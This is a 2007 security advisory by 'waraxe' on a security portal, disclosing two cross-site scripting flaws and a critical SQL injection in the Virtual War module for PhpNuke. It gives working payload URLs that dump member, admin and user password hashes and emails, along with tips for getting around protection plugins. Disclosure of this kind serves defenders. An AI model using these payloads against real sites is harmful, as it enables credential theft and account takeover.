Waraxe IT Security Portal
Login or Register
September 20, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 70
Members: 0
Total: 70
Full disclosure
Stored XSS in "Edit Profile" - htmlyv2.9.9
Stored XSS in "Menu Editor" - htmlyv2.9.9
Backdoor.Win32.BlackAngel .13 / Unauthenticated Remote CommandExecution
Backdoor.Win32.CCInvader. 10 / Authentication Bypass
Backdoor.Win32.Delf.yj / Information Disclosure
SEC Consult blog :: Microsoft Windows MSI Installer - Repair to SYSTEM - A detailed journey (CVE-2024-38014) + msiscan tool release
Stored XSS to Account Takeover - htmlyv2.9.9
APPLE-SA-09-16-2024-10 macOS Ventura 13.7
APPLE-SA-09-16-2024-9 macOS Sonoma 14.7
APPLE-SA-09-16-2024-8 iOS 17.7 and iPadOS 17.7
APPLE-SA-09-16-2024-7 Xcode 16
APPLE-SA-09-16-2024-6 Safari 18
APPLE-SA-09-16-2024-5 visionOS 2
APPLE-SA-09-16-2024-4 watchOS 11
APPLE-SA-09-16-2024-3 tvOS 18
[waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke





Author: Janek Vind "waraxe"
Date: 13. April 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-48.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VWar module for PhpNuke

http://www.vwar.de/

VWar is a webbased matchorganizing system for online gamers.
The complete output is realised by PHP with MySQL as database backend.
The system is divided into 2 parts, the public area and the admin area.

VWar 1.5.0 R15 is out.
Changes:
fixed: mysql injection bug in extra/ files

// I guess, they have not fixed all the bugs yet :) //

Affected are Virtual War versions 1.5 R15 and below


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Found security bugs: one critical sql injection and two XSS bugs.
There are probably more vulnerabilities, had no time for deeper analyze ...


1. XSS in "/modules/vwar/extra/today.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.target.com/modules/vwar/extra/today.php?whattoshow=3&title=kala<script>alert(document.cookie);</script>

Problem is caused by uninitialized variable "$title". Successful exploitation requires that "register_globals" is "on"
in php settings.


2. XSS in "/modules/vwar/extra/login.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.target.com/modules/vwar/extra/login.php?memberlist=</select></form><script>alert(document.cookie);</script>

Similar to previous case this XSS is caused by uninitialized variable, in this time "$memberlist".
Successful exploitation requires that "register_globals" is "on" in php settings.


3. Critical sql injection bug in many VWar scripts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Personally, I like uninitialized variables in php source code. They are giving so much cool possibilities to
everyone, who is searching for secutity holes. And this serious sql injection case has his roots in same problem.

Let's look @ "/modules/vwar/extra/online.php" line 63:

----------------[ from source code ]------------------
$query = $vwardb->query("
SELECT memberid, name, lastactivity
FROM vwar".$n."_member WHERE lastactivity > ".(time() - $onlinetime * 60)."
");
----------------[ /from source code ]-----------------

And by the way - "$n" variable is not initialized! So what happens, if we issue this query:

http://www.victim.com/modules/vwar/extra/online.php?n=waraxe

Oops... We got error message:


-> Database Error: Invalid SQL:
SELECT memberid, name, lastactivity
FROM vwarwaraxe_member WHERE lastactivity > 1176476015

-> MySQL Error: Table 'victimdb.vwarwaraxe_member' doesn't exist
-> MySQL Error Number: 1146
-> Date: 11.04.2007 @ 18:03
-> Script: /modules/vwar/extra/online.php?n=waraxe
-> Referer:

Now, can we exploit this sql injection? Let's try next move:

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,@@version,3/*

4.1.22

It works!! Now it's time for more serious fun:

[[[[[ kidd0z - attentione ]]]]]

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+
UNION+ALL+SELECT+1,CONCAT(name,CHAR(94),password,CHAR(94),email),3+FROM+vwar_member/*

... and we get all vwar member usernames, password double-md5 hashes and emails

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+
UNION+ALL+SELECT+1,CONCAT(aid,CHAR(94),pwd,CHAR(94),email),3+FROM+nuke_authors/*

... and we have all the nuke admin usernames, md5 hashes and emails

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+
UNION+ALL+SELECT+1,CONCAT(username,CHAR(94),user_password,CHAR(94),user_email),3+FROM+nuke_users/*

... and finally, all the nuke user credentials in one big listing :)

Remarks:

R01 - Sentinel, Protector and other powerful phpnuke protection systems - they will not work
against this exploits. Because we are not entering from front door, but will use rear window :)

R02 - "register_globals" must be "on" for exploits to work

R03 - phpnuke table prefix can be changed from default, in this case - no nuke user and admin data!

R04 - there can be need for playing with "$n" value. Because vwar module installer can assaign different
values besides empty value. So if default exploit will not work, then this can be tried:

/online.php?n=0_member+WHERE
/online.php?n=1_member+WHERE
/online.php?n=2_member+WHERE

... and so on.
And because we have perfect sql error feedback, then it is easy to overcome various exploiting problems.

R05 - many other scripts in "extra" directory have same sql injection vulnerability!


See ya soon and have a nice day ;)


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to LINUX, Heintz, slimjim100, shai-tan, y3dips and all
other people who know me!

Special greets goes to Raido Kerna.

Tervitusi Torufoorumi rahvale!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/


Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DX expedition database - http://www.dxdb.com/
Amateur Radio Database - http://www.hamdb.com/

---------------------------------- [ EOF ] ------------------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2007-04-13 (24291 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2407
vince213333  vince213333 - 737
pexli  pexli - 665
Mullog  Mullog - 540
demon  demon - 485
shai-tan  shai-tan - 477
LINUX  LINUX - 404
Cyko  Cyko - 375
tsabitah  tsabitah - 328
y3dips  y3dips - 281
Cybercrime news
Hackers Demand $6 Million From Seattle Airport Operators
Recent WhatsUp Gold Vulnerabilities Possibly Exploited In Ransomware Attacks
Cops Across The World Arrest 51 In Orchestrated Takedown Of Ghost Crime Platform
France Uses Tough, Untested Cybercrime Law To Target Durov
Ransomware Group Leaks Data Stolen From Kawasaki Motors
Old WHOIS Domain Could Have Issued Fraudulent TLS/SSL Certs
Hackers Use Cloud Services To Target Financial And Insurance Firms
When You Pay A Ransom And The Decryptor Doesn't Work
Crypto Scams Rake In $5.6B A Year For Lowlifes, FBI Says
Cisco Merch Shoppers Stung In Magecart Attack
Planned Parenthood Confirms Attack Claimed By RansomHub
Russian Doppelganger Campaign Exposed
FBI: North Korea Aggressively Hacking Cryptocurrency Firms
RansomHub Claims 210 Victims In Just 6 Months
US Government Issues Advisory On Ransomware Group Blamed For Halliburton Cyberattack
Cybercrime And Sabotage Cost German Firms $300 Billion In Past Year
Hunters International Ransomware Gang Threatens To Leak US Marshals Data
EDR Killer Ransomware: What It Is, How To Repel
Cisco Calls For UN To Revisit Cybercrime Convention
Digital Wallets Can Allow Purchases With Stolen Credit Cards
Russian Sells Almost 3,000 Logins, Gets 40 Months In Jail
Kimble To Be Extradited From New Zealand After 12 Year Fight With US
Dispossessor Ransomware Group Shut Down By US, EU Authorities
Ransomware Attack Cost LoanDepot $27 Million
Police Recover $40 Million Stolen In Business Email Scam
Hacker news
Hackers Demand $6 Million From Seattle Airport Operators
FBI Boss Says China Burned Down 260,000 Device Botnet When Confronted By Feds
British MPs And International Organizations Hacked On X
CloudImposer Attack Targets Google Cloud Services
Cops Across The World Arrest 51 In Orchestrated Takedown Of Ghost Crime Platform
Predator Spyware Kingpins Added To US Sanctions List
Ransomware Group Leaks Data Stolen From Kawasaki Motors
1.3 Million Android-Based TV Boxes Backdoored
23andMe Settles Class Action Breach Lawsuit For $30 Million
20 Gigs Of Data Supposedly Stolen From Capgemini
Fortinet Admits Miscreant Got Hold Of Customer Data In The Cloud
Evasion Tactics Used By Cybercriminals To Fly Under The Radar
Hackers Use Cloud Services To Target Financial And Insurance Firms
BT Spots 2,000 Potential Attacks On Its Network A Second
Chinese Hackers Linked To Syndicate Arrested In Singapore
Hacker Steals Data On 300k From Avis
When You Pay A Ransom And The Decryptor Doesn't Work
NPD Breach Underscores The Need For Stronger Digital Identities
Microsoft Says Windows Update Zero-Day Being Exploited To Undo Security Fixes
Electronic Payment Firm Slim CD Notifies 1.7M Customers Of Data Breach
Crypto Scams Rake In $5.6B A Year For Lowlifes, FBI Says
Cisco Merch Shoppers Stung In Magecart Attack
Predator Spyware Resurfaces With Fresh Infrastructure
New RAMBO Attack Allows Air-Gapped Data Theft Via RAM Radio Signals
Recent SonicWall Firewall Vuln Exploited In The Wild
Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.041 Seconds